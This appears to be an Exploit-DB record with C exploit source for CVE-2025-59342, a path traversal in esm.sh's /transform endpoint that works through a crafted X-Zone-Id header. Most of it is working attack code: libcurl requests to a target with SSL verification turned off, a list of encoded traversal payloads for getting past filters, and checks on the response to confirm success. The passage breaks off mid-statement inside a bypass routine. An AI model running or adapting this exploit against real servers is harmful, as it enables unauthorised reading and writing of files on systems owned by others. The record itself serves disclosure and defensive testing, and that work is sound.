{“lastseen”:”2025-12-16T08:46:49″,”description”:”Exploit Title: esm-dev 136 – Path Traversal Date: 2025-07-11 Exploit Author: Byte Reaper Vendor Homepage: https:\/\/github.com\/esm-dev\/esm.sh Software Link: https:\/\/github.com\/esm-dev\/esm.sh CVE-2025-59342 – File : exploit.c – Date : 09\/17\/2025 – Target…”,”published”:”2025-12-16T00:00:00″,”modified”:”2025-12-16T00:00:00″,”type”:”exploitdb”,”title”:”esm-dev 136 – Path Traversal”,”source”:””,”references”:””,”id”:”EDB-ID:52461″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59342″],”sourceData”:”# Exploit Title: esm-dev 136 – Path Traversal\\r\\n# Date: 2025-07-11\\r\\n# Exploit Author: Byte Reaper \\r\\n#Vendor Homepage: https:\/\/github.com\/esm-dev\/esm.sh\\r\\n# Software Link: https:\/\/github.com\/esm-dev\/esm.sh\\r\\n# CVE-2025-59342\\r\\n – File : exploit.c\\r\\n – Date : 09\/17\/2025\\r\\n – Target : esm-dev\\r\\n – Version: 136\\r\\n – Target Endpoint : \/transform\\r\\n – Target Header : X-Zone-Id\\r\\n – Vuln : \\r\\n – Run exploit : \\r\\n # gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl\\r\\n # .\/CVE-2025-59342\\r\\n\\r\\n#include \\u003ccurl\/curl.h\\u003e\\r\\n#include \\u003cstring.h\\u003e\\r\\n#include \\u003cstdlib.h\\u003e\\r\\n#include \\”argparse.h\\”\\r\\n#include \\u003ctime.h\\u003e\\r\\n#include \\u003cunistd.h\\u003e\\r\\n#include \\u003csys\/utsname.h\\u003e\\r\\n#define FULL_URL 2500 \\r\\n#define P_Y 2000\\r\\n#define POST_DATA 9000\\r\\nint flagPort = 0;\\r\\nint port = 80;\\r\\nint selectPort = -1;\\r\\nint verbose = 0;\\r\\nint code = 1;\\r\\nint found = 1;\\r\\nint cF = 0;\\r\\nint s = 0;\\r\\nint bY = 0;\\r\\nint sP = 0;\\r\\nconst char* cookies = NULL;\\r\\nconst char* payload = NULL;\\r\\nvoid exit64bit()\\r\\n{\\r\\n int n = 0;\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”mov $0x4A, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rdi\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”test %%rax, %%rax\\\\n\\\\t\\”\\r\\n \\”jz .aD\\\\n\\\\t\\”\\r\\n \\”mov $0x0, %[var]\\\\n\\\\t\\”\\r\\n \\”jmp .finish\\\\n\\\\t\\”\\r\\n \\”.aD:\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %[var]\\\\n\\\\t\\”\\r\\n \\”.finish:\\\\n\\\\t\\”\\r\\n : [var] \\”+r\\” (n)\\r\\n :\\r\\n : \\”rax\\”,\\r\\n \\”rdi\\”\\r\\n );\\r\\n if (n == 0)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] sys_fsync syscall Faild.\\\\n\\”);\\r\\n fflush(stdout);\\r\\n }\\r\\n else if (n == 1)\\r\\n {\\r\\n printf(\\”[+] sys_fsync syscall Success.\\\\n\\”);\\r\\n }\\r\\n\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”mov $0x0, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov $0x3C, %%rax\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n :\\r\\n :\\r\\n : \\”rax\\”, \\r\\n \\”rdi\\”\\r\\n ); \\r\\n}\\r\\n\\r\\nstruct Mem\\r\\n{\\r\\n char* buffer;\\r\\n size_t len;\\r\\n};\\r\\nsize_t write_cb(void* ptr, size_t size, size_t nmemb, void* userdata)\\r\\n{\\r\\n size_t total = size * nmemb;\\r\\n struct Mem* m = (struct Mem*)userdata;\\r\\n char* tmp = realloc(m-\\u003ebuffer, m-\\u003elen + total + 1);\\r\\n if (!tmp) return 0;\\r\\n m-\\u003ebuffer = tmp;\\r\\n memcpy(\\u0026(m-\\u003ebuffer[m-\\u003elen]), ptr, total);\\r\\n m-\\u003elen += total;\\r\\n m-\\u003ebuffer[m-\\u003elen] = ‘\\\\0’;\\r\\n return total;\\r\\n}\\r\\n\\r\\nint checkLen(int len, char* buf, size_t bufcap)\\r\\n{\\r\\n if (len \\u003c 0 || (size_t)len \\u003e= bufcap)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Len is Long ! \\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;31m[-] Len %d\\\\e[0m\\\\n\\”, len);\\r\\n return 1;\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;34m[+] Len Is Not Long.\\\\e[0m\\\\n\\”);\\r\\n return 0;\\r\\n\\r\\n }\\r\\n return 0;\\r\\n}\\r\\n\\r\\nconst char* payloads[] = \\r\\n{\\r\\n \\”..\/\/..\/\/modules\/\/transform\/\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\/\/\\”,\\r\\n \\”….\/….\/m.o.d.u.les\/transform\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\/\\”,\\r\\n \\”..\\\\\\\\\/..\\\\\\\\\/modules\\\\\\\\\/transform\\\\\\\\\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\\\\\\\\\/\\”,\\r\\n \\”.\/\/.\/\/m?odu?le?s\/tran.sfo.rm\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\/\\”,\\r\\n \\”..%252f%252f..%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f\\”,\\r\\n \\”%252e%252e%252f%252f%252e%252e%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f\\”,\\r\\n \\”..%2f%2f..modules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f\\”,\\r\\n \\”%2e%2e%2f%2f%2e%2emodules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f\\”,\\r\\n \\”..%255c%255c..%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c\\”,\\r\\n \\”%252e%252e%255c%255c%252e%252e%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c\\”,\\r\\n \\”%u002e%u002e%u2215%u2215%u002e%u002e%u2215%u2215modules%u002e%u002etransform%u002e%u002ec245626ef6ca0fd9ee37759c5fac606c6ec99daa%u002e\\”,\\r\\n \\”%u002e%u002e%u2216%u2216%u002e%u002e%u2216%u2216modules%u2216%u2216transform%u2216%u2216c245626ef6ca0fd9ee37759c5fac606c6ec99daa%u2216\\”,\\r\\n \\”%e0%40%ae%e0%40%ae%e0%80%af%e0%80%af%e0%40%ae%e0%40%ae%e0%80%af%e0%80%afmodules%e0%80%af%e0%80%aftransform%e0%80%af%e0%80%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%e0%80%af\\”,\\r\\n \\”.%00.\/\/.%00.\/\/modules\/\/transform\/\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\/\\”,\\r\\n \\”..;\/\/..;\/\/modules\/\/transform\/\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\/\\”,\\r\\n \\”%c0%2e%c0%2e%c0%af%c0%af%c0%2e%c0%2e%c0%af%c0%afmodules%c0%af%c0%aftransform%c0%af%c0%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%c0%af\\”,\\r\\n NULL\\r\\n\\r\\n};\\r\\n\\r\\nstatic void request(const char *baseurl)\\r\\n{\\r\\n CURL* curl = curl_easy_init();\\r\\n const char *mes3 = \\”\\\\e[0;34m[+] Create Object CURL Success.\\\\n\\”;\\r\\n const char *mes4 = \\”\\\\e[0;31m[-] Error Create Object CURL !\\\\e[0m\\\\n\\”;\\r\\n size_t len3 = strlen(mes3);\\r\\n size_t len4 = strlen(mes4);\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”cmp $0x0, %[curlO]\\\\n\\\\t\\”\\r\\n \\”je .donV\\\\n\\\\t\\”\\r\\n \\”.erD:\\\\n\\\\t\\” \\r\\n \\”mov $0x1, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov %[msg], %%rsi\\\\n\\\\t\\”\\r\\n \\”mov %[len], %%rdx\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”jmp .finishC\\\\n\\\\t\\”\\r\\n \\”.donV:\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov %[msg1], %%rsi\\\\n\\\\t\\”\\r\\n \\”mov %[len1], %%rdx\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”xor %%rdi, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov $0x3C, %%rax\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”.finishC:\\\\n\\\\t\\”\\r\\n :\\r\\n : [curlO] \\”r\\” (curl),\\r\\n [msg] \\”r\\” ((const char *)mes3),\\r\\n [len] \\”r\\” ((long)len3),\\r\\n [msg1] \\”r\\” ((const char*)mes4),\\r\\n [len1] \\”r\\” ((long)len4)\\r\\n : \\”rax\\”,\\r\\n \\”rdi\\”,\\r\\n \\”rsi\\”,\\r\\n \\”rdx\\”,\\r\\n \\”rcx\\”,\\r\\n \\”r11\\”,\\r\\n \\”memory\\”\\r\\n );\\r\\n struct Mem response;\\r\\n CURLcode res;\\r\\n response.buffer = NULL;\\r\\n response.len = 0;\\r\\n const char* mes5 = \\”\\\\e[0;34m[+] Buffer Clean Success.\\\\e[0m\\\\n\\”;\\r\\n size_t len5 = strlen(mes5);\\r\\n __asm__ volatile (\\r\\n \\”test %[buffer], %[buffer]\\\\n\\\\t\\”\\r\\n \\”jz L_print_clean\\\\n\\\\t\\”\\r\\n \\”L_continue:\\\\n\\\\t\\”\\r\\n \\”jmp L_done\\\\n\\\\t\\”\\r\\n \\”L_print_clean:\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rdi\\\\n\\\\t\\”\\r\\n \\”movq %[msg13], %%rsi\\\\n\\\\t\\”\\r\\n \\”mov %[len13], %%rdx\\\\n\\\\t\\” \\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”L_done:\\\\n\\\\t\\”\\r\\n :\\r\\n : [buffer] \\”r\\” ((const char*)response.buffer),\\r\\n [msg13] \\”r\\” (mes5),\\r\\n [len13] \\”r\\” (len5)\\r\\n : \\”rax\\”,\\r\\n \\”rdi\\”,\\r\\n \\”rsi\\”,\\r\\n \\”rdx\\”,\\r\\n \\”rcx\\”,\\r\\n \\”r11\\”,\\r\\n \\”memory\\”\\r\\n );\\r\\n char full[FULL_URL];\\r\\n \\r\\n\\tif (flagPort != 0)\\r\\n\\t{\\r\\n const char* mes8 = \\”\\\\e[0;31m[-] Select Port is NULL !\\\\e[0m\\\\n\\”;\\r\\n size_t len8 = strlen(mes8);\\r\\n __asm__ volatile (\\r\\n \\”test %[var22], %[var22]\\\\n\\\\t\\”\\r\\n \\”jnz L_finish\\\\n\\\\t\\”\\r\\n \\”mov $1, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $1, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov %[msg13], %%rsi\\\\n\\\\t\\”\\r\\n \\”mov %[len13], %%rdx\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”xor %%rdi, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov $0x3C, %%rax\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”L_finish:\\\\n\\\\t\\”\\r\\n :\\r\\n : [var22] \\”r\\” (selectPort),\\r\\n [msg13] \\”r\\” (mes8),\\r\\n [len13] \\”r\\” (len8)\\r\\n : \\”rax\\”, \\r\\n \\”rdi\\”, \\r\\n \\”rsi\\”, \\r\\n \\”rdx\\”, \\r\\n \\”rcx\\”, \\r\\n \\”r11\\”, \\r\\n \\”memory\\”\\r\\n );\\r\\n\\t\\tprintf(\\”\\\\e[0;34m[+] Port Select : %d\\\\e[0m\\\\n\\”, \\r\\n selectPort);\\r\\n\\t\\tint len1 = snprintf(full, \\r\\n FULL_URL, \\r\\n \\”%s:%d\/transform\\”, \\r\\n baseurl,selectPort);\\r\\n if (checkLen(len1, \\r\\n full, \\r\\n FULL_URL) == 1)\\r\\n {\\r\\n fprintf(stderr, \\r\\n \\”\\\\e[0;31m[-] Error write base url !\\\\e[0m\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n printf(\\”\\\\e[0;34m[+] Write base URL success.\\\\e[0m\\\\n\\”);\\r\\n\\t}\\r\\n\\telse if (flagPort == 0)\\r\\n\\t{\\r\\n\\t\\tprintf(\\”\\\\e[0;34m[+] Auto port : %d\\\\e[0m\\\\n\\”, port);\\r\\n int len2 = snprintf(full, \\r\\n FULL_URL, \\r\\n \\”%s:%d\/transform\\”, \\r\\n baseurl, \\r\\n port);\\r\\n if (checkLen(len2, full, FULL_URL) == 1)\\r\\n {\\r\\n fprintf(stderr, \\r\\n \\”\\\\e[0;31m[-] Error write base url !\\\\e[0m\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n printf(\\”\\\\e[0;34m[+] Write base URL success.\\\\e[0m\\\\n\\”);\\r\\n\\t}\\r\\n printf(\\”[+] Base URL : %s\\\\n\\”, baseurl);\\r\\n printf(\\”[+] Result full url : %s\\\\n\\”, full);\\r\\n char post[POST_DATA];\\r\\n int len9 = snprintf(post, POST_DATA, \\”{\\\\\\”filename\\\\\\”:\\\\\\”cve.js\\\\\\”,\\\\\\”lang\\\\\\”:\\\\\\”js\\\\\\”,\\\\\\”code\\\\\\”:\\\\\\”console.log(‘Exploit!’);\\\\\\”,\\\\\\”importMap\\\\\\”:{\\\\\\”imports\\\\\\”:{\\\\\\”react\\\\\\”:\\\\\\”https:\/\/esm.sh\/react\\\\\\”,\\\\\\”react-dom\\\\\\”:\\\\\\”https:\/\/esm.sh\/react-dom\\\\\\”}},\\\\\\”jsxImportSource\\\\\\”:\\\\\\”react\\\\\\”,\\\\\\”target\\\\\\”:\\\\\\”es2022\\\\\\”,\\\\\\”sourceMap\\\\\\”:\\\\\\”external\\\\\\”,\\\\\\”minify\\\\\\”:true}\\”);\\r\\n if (checkLen(len9, post, POST_DATA) == 1)\\r\\n {\\r\\n fprintf(stderr, \\r\\n \\”[-] Error write post data !\\\\e[0m\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n printf(\\”\\\\e[0;34m[+] Write Post data Success.\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;35m[+] Post data :===================================\\\\e[0m\\\\n\\”);\\r\\n printf(\\”%s\\\\n\\”, post);\\r\\n printf(\\”\\\\e[0;32m[+] Size : %d\\\\e[0m\\\\n\\”, POST_DATA);\\r\\n printf(\\”\\\\e[0;32m[+] Len : %zu\\\\e[0m\\\\n\\”, strlen(post));\\r\\n printf(\\”\\\\e[0;35m==================================================\\\\e[0m\\\\n\\”);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_URL,\\r\\n full);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_ACCEPT_ENCODING,\\r\\n \\”\\”);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_FOLLOWLOCATION,\\r\\n 1L);\\r\\n if (cF)\\r\\n {\\r\\n\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEFILE,\\r\\n cookies);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEJAR,\\r\\n cookies);\\r\\n\\r\\n }\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_POST,\\r\\n 1L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_POSTFIELDS,\\r\\n post);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_POSTFIELDSIZE,\\r\\n (long)strlen(post));\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_WRITEFUNCTION,\\r\\n write_cb);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_WRITEDATA,\\r\\n \\u0026response);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_CONNECTTIMEOUT,\\r\\n 5L);\\r\\n struct timespec rqtp, rmtp;\\r\\n rqtp.tv_sec = 1;\\r\\n rqtp.tv_nsec = 500000000;\\r\\n register long r10R asm(\\”r10\\”);\\r\\n r10R = 0;\\r\\n printf(\\”\\\\e[0;33m[+] Sleep (%ld seconds) \\u0026\\u0026 (%ld nanoseconds)…\\\\e[0m\\\\n\\”,\\r\\n rqtp.tv_sec, rqtp.tv_nsec);\\r\\n int ret;\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”syscall\\”\\r\\n : \\”=a\\”(ret)\\r\\n : \\”a\\”(0xE6),\\r\\n \\”D\\”((long)0),\\r\\n \\”S\\”((long)0),\\r\\n \\”d\\”(\\u0026rqtp),\\r\\n \\”r\\”(r10R)\\r\\n : \\”rcx\\”,\\r\\n \\”r11\\”,\\r\\n \\”memory\\”\\r\\n );\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_TIMEOUT,\\r\\n 10L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYPEER,\\r\\n 0L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYHOST,\\r\\n 0L);\\r\\n struct curl_slist* headers = NULL;\\r\\n headers = curl_slist_append(headers,\\r\\n \\”User-Agent: Den\/8.7.1\\”);\\r\\n headers = curl_slist_append(headers,\\r\\n \\”Accept: *\/*\\”);\\r\\n headers = curl_slist_append(headers,\\r\\n \\”Connection: keep-alive\\”);\\r\\n headers = curl_slist_append(headers,\\r\\n \\”Content-Type: application\/json\\”);\\r\\n headers = curl_slist_append(headers,\\r\\n \\”Referer: http:\/\/localhost:9999\/\\”); \\r\\n if (s!=0)\\r\\n {\\r\\n printf(\\”[+] Your Payload : %s\\\\n\\”, payload);\\r\\n printf(\\”\\\\e[0;33m[+] Checking payload…\\\\n\\”);\\r\\n\\r\\n if (strstr(payload, \\”..\/\\”) || strstr(payload, \\”..\\\\\\\\\\”)) \\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] Detected path traversal \\\\\\”..\/\\\\\\” in payload.\\\\n\\”);\\r\\n }\\r\\n else \\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] No path traversal detected. Please provide a valid payload.\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n\\r\\n if (strstr(payload, \\”\/transform\\”)) \\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] Detected endpoint ‘\/transform’ in payload.\\\\n\\”);\\r\\n }\\r\\n else \\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Endpoint ‘\/transform’ not detected in payload!\\\\n\\”);\\r\\n exit64bit();;\\r\\n }\\r\\n \\r\\n }\\r\\n \\r\\n else\\r\\n {\\r\\n headers = curl_slist_append(headers,\\r\\n \\”X-Zone-Id: ..\/..\/modules\/transform\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\/\\”); \/\/auto payload \\r\\n printf(\\”[+] Auto payload ..\/..\/modules\/transform\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\/.\\\\n\\”);\\r\\n } \\r\\n curl_easy_setopt(curl, \\r\\n CURLOPT_HTTPHEADER, \\r\\n headers);\\r\\n if (verbose)\\r\\n {\\r\\n curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);\\r\\n }\\r\\n res = curl_easy_perform(curl);\\r\\n curl_slist_free_all(headers);\\r\\n if (res == CURLE_OK)\\r\\n {\\r\\n printf(\\”\\\\e[1;36m[+] Request sent successfully\\\\e[0m\\\\n\\”);\\r\\n long httpcode;\\r\\n double timeT;\\r\\n double timeR;\\r\\n char* urlD = NULL;\\r\\n curl_easy_getinfo(curl, \\r\\n CURLINFO_RESPONSE_CODE,\\r\\n \\u0026httpcode);\\r\\n curl_easy_getinfo(curl, \\r\\n CURLINFO_TOTAL_TIME, \\r\\n \\u0026timeT);\\r\\n curl_easy_getinfo(curl,\\r\\n CURLINFO_REDIRECT_TIME,\\r\\n \\u0026timeR);\\r\\n curl_easy_getinfo(curl,\\r\\n CURLINFO_REDIRECT_URL,\\r\\n \\u0026urlD);\\r\\n printf(\\”\\\\e[0;32m[+] Delayed response : %f\\\\e[0m\\\\n\\”, timeT);\\r\\n printf(\\”\\\\e[0;34m[+] TIME REDIRECT: %.1f\\\\e[0m\\\\n\\”, timeR);\\r\\n if (urlD == NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] Not REDIRECT Found.\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;34m[+] REDIRECT To : %s\\\\e[0m\\\\n\\”, urlD);\\r\\n }\\r\\n \\r\\n printf(\\”\\\\e[0;32m[+] HTTP CODE : %ld\\\\n\\”, httpcode);\\r\\n if (response.buffer != NULL)\\r\\n {\\r\\n printf(\\”\\\\e[0;35m=============================================== [RESPONSE] ===============================================\\\\e[0m\\\\n\\”);\\r\\n printf(\\”%s\\\\n\\”, response.buffer);\\r\\n printf(\\”\\\\e[0;32m[+] Size Pointer response : %d\\\\e[0m\\\\n\\”, sizeof(response.buffer));\\r\\n printf(\\”\\\\e[0;32m[+] Len : %zu\\\\e[0m\\\\n\\”, response.len);\\r\\n printf(\\”\\\\e[0;35m==========================================================================================================\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error show buffer : NULL response !\\\\n\\”);\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”mov $0x0, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov $0xE7, %%rax\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n :\\r\\n :\\r\\n :\\”rax\\”,\\r\\n \\”rdi\\”\\r\\n );\\r\\n }\\r\\n printf(\\”===========================================================================================================\\\\n\\”);\\r\\n if (httpcode \\u003e= 200 \\u0026\\u0026 httpcode \\u003c 300)\\r\\n {\\r\\n const char* words[] = \\r\\n {\\r\\n \\”Exploit!\\”,\\r\\n \\”cve.js\\”,\\r\\n \\”mjs\\”,\\r\\n \\”console\\”,\\r\\n \\”code\\”,\\r\\n \\”map\\”,\\r\\n \\”AAAA\\”,\\r\\n \\”IAAI\\”,\\r\\n \\”names\\”,\\r\\n NULL\\r\\n };\\r\\n printf(\\”\\\\e[0;32m[+] Http code (200 – 300)\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;33m[+] Check Word in response…\\\\e[0m\\\\n\\”);\\r\\n \\r\\n for (int u = 0; words[u] != NULL; u++)\\r\\n {\\r\\n code = 1;\\r\\n if (strstr(response.buffer, words[u]) != NULL)\\r\\n {\\r\\n printf(\\”[+] Word found in response : %s\\\\n\\”,\\r\\n words[u]);\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”mov $0x0, %[var12]\\\\n\\\\t\\”\\r\\n : [var12] \\”=r\\” (found)\\r\\n :\\r\\n :\\r\\n );\\r\\n break;\\r\\n }\\r\\n }\\r\\n if (found == 0)\\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] Words were found in the server’s response, indicating that the exploitation was likely successful.\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n const char *mes11 = \\”\\\\e[0;31m[-] Not found words in response !\\\\e[0m\\\\n\\”;\\r\\n size_t len11 = strlen(mes11);\\r\\n __asm__ volatile \\r\\n (\\r\\n \\”test %[var11], %[var11]\\\\n\\”\\r\\n \\”jnz notZero\\\\n\\\\t\\”\\r\\n \\”jmp finish11\\\\n\\\\t\\”\\r\\n \\”notZero:\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rdi\\\\n\\\\t\\”\\r\\n \\”movq %[size11], %%rsi\\\\n\\\\t\\”\\r\\n \\”mov %[len11], %%rdx\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”finish11:\\\\n\\\\t\\”\\r\\n :\\r\\n : [var11] \\”r\\” ((int)found),\\r\\n [size11] \\”r\\” ((const char *)mes11),\\r\\n [len11] \\”r\\” (len11)\\r\\n :\\”rax\\”, \\r\\n \\”rdi\\”, \\r\\n \\”rsi\\”, \\r\\n \\”rdx\\”,\\r\\n \\”r11\\”, \\r\\n \\”rcx\\”, \\r\\n \\”memory\\”\\r\\n \\r\\n );\\r\\n \\r\\n \\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Http code Not range (200 – 300)\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;31m[-] Please check url and port.\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n printf(\\”\\\\e[0;35m[+] Result Exploit :\\\\e[0m\\\\n\\”);\\r\\n\\r\\n if (code == 1 \\u0026\\u0026 found == 0)\\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] HTTP code positive and expected word found: Exploit succeeded (CVE-2025-59342).\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else if (code == 1 \\u0026\\u0026 found != 0)\\r\\n {\\r\\n printf(\\”\\\\e[0;36m[+] HTTP code positive but expected word not found: Partial success (CVE-2025-59342).\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else if (code != 1 \\u0026\\u0026 found == 0)\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] HTTP code negative but word found: Unexpected result (CVE-2025-59342).\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else \\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Exploitation did not succeed.\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[0;31m[-] Error Send Request !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[0;31m[-] Error : %s\\\\n\\”, curl_easy_strerror(res));\\r\\n exit64bit();\\r\\n }\\r\\n curl_easy_cleanup(curl);\\r\\n free(response.buffer);\\r\\n}\\r\\n\\r\\nvoid bypass(const char* urlB)\\r\\n{\\r\\n struct Mem responseBypass;\\r\\n responseBypass.buffer = NULL;\\r\\n responseBypass.len = 0;\\r\\n\\r\\n const char* mes14 = \\”\\\\e[0;34m[+] Buffer Clean Success.\\\\e[0m\\\\n\\”;\\r\\n size_t len14 = strlen(mes14);\\r\\n __asm__ volatile (\\r\\n \\”test %[buffer1], %[buffer1]\\\\n\\\\t\\”\\r\\n \\”jz L_print_clean1\\\\n\\\\t\\”\\r\\n \\”L_continue1:\\\\n\\\\t\\”\\r\\n \\”jmp L_done1\\\\n\\\\t\\”\\r\\n \\”L_print_clean1:\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rax\\\\n\\\\t\\”\\r\\n \\”mov $0x1, %%rdi\\\\n\\\\t\\”\\r\\n \\”movq %[msg14], %%rsi\\\\n\\\\t\\”\\r\\n \\”mov %[len14], %%rdx\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n \\”L_done1:\\\\n\\\\t\\”\\r\\n :\\r\\n : [buffer1] \\”r\\” ((const char*)responseBypass.buffer),\\r\\n [msg14] \\”r\\” (mes14),\\r\\n [len14] \\”r\\” (len14)\\r\\n : \\”rax\\”,\\r\\n \\”rdi\\”,\\r\\n \\”rsi\\”,\\r\\n \\”rdx\\”,\\r\\n \\”rcx\\”,\\r\\n \\”r11\\”,\\r\\n \\”memory\\”\\r\\n );\\r\\n CURL* curl = curl_easy_init();\\r\\n if (curl == NULL)\\r\\n {\\r\\n fprintf(stderr,\\”[-] Error Create Object CURL !\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n CURLcode res1;\\r\\n char postData[POST_DATA];\\r\\n int len15 = snprintf(postData, \\r\\n POST_DATA, \\r\\n \\”{\\\\\\”filename\\\\\\”:\\\\\\”cve.js\\\\\\”,\\\\\\”lang\\\\\\”:\\\\\\”js\\\\\\”,\\\\\\”code\\\\\\”:\\\\\\”console.log(‘Exploit!’);\\\\\\”,\\\\\\”importMap\\\\\\”:{\\\\\\”imports\\\\\\”:{\\\\\\”react\\\\\\”:\\\\\\”https:\/\/esm.sh\/react\\\\\\”,\\\\\\”react-dom\\\\\\”:\\\\\\”https:\/\/esm.sh\/react-dom\\\\\\”}},\\\\\\”jsxImportSource\\\\\\”:\\\\\\”react\\\\\\”,\\\\\\”target\\\\\\”:\\\\\\”es2022\\\\\\”,\\\\\\”sourceMap\\\\\\”:\\\\\\”external\\\\\\”,\\\\\\”minify\\\\\\”:true}\\”);\\r\\n if (checkLen(len15, \\r\\n postData, \\r\\n POST_DATA) == 1)\\r\\n {\\r\\n fprintf(stderr,\\r\\n \\”[-] Error write post data !\\\\e[0m\\\\n\\”);\\r\\n exit64bit();\\r\\n }\\r\\n if (curl)\\r\\n {\\r\\n for (int i = 0; payloads[i] != NULL; i++)\\r\\n {\\r\\n struct curl_slist* h = NULL;\\r\\n char fullURL[FULL_URL];\\r\\n snprintf(fullURL, \\r\\n FULL_URL, \\r\\n \\”%s\/transform\\”, \\r\\n urlB);\\r\\n char hLine[1024];\\r\\n snprintf(hLine, \\r\\n 1024, 